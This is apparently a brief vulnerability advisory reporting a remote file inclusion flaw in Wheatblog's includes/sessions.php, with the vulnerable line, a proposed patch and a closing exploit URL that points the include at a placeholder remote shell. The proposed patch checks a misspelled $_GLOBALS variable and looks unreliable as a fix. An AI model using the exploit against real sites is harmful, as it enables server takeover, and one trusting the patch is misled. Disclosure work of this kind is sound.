|
Hello,,=0D
=0D
Wheatblog (wB) Remote File inclusion ..=0D
=0D
tested on 1.1 and older versions are injected=0D
=0D
Discovered By : HACKERS PAL=0D
Copy rights : HACKERS PAL=0D
Website : http://www.soqor.net=0D
Email Address : security@soqor.net=0D
=0D
Remote File Inclusion=0D
file : includes/sessions.php=0D
=0D
line 2 :=0D
code:-=0D
include_once("$wb_class_dir/classDatabase.php");=0D
=0D
variable wb_class_dir can be controlled and edited to be included from remote ..=0D
=0D
Solution=0D
=0D
replace=0D
code :-=0D
include_once("$wb_class_dir/classDatabase.php");=0D
=0D
with=0D
code:-=0D
// Protected By : HACKERS PAL=0D
// Security@soqor.net=0D
// Http://WwW.SoQoR.NeT=0D
=0D
if(eregi("sessions.php",$PHP_SELF) || isset($_GLOBALS['wb_class_dir']))=0D
{=0D
die("
Forbidden 403
");=0D
}=0D
include_once("$wb_class_dir/classDatabase.php");=0D
=0D
=0D
Exploit : -=0D
includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?=0D
=0D
#WwW.SoQoR.NeT
Protected By : HACKERS PAL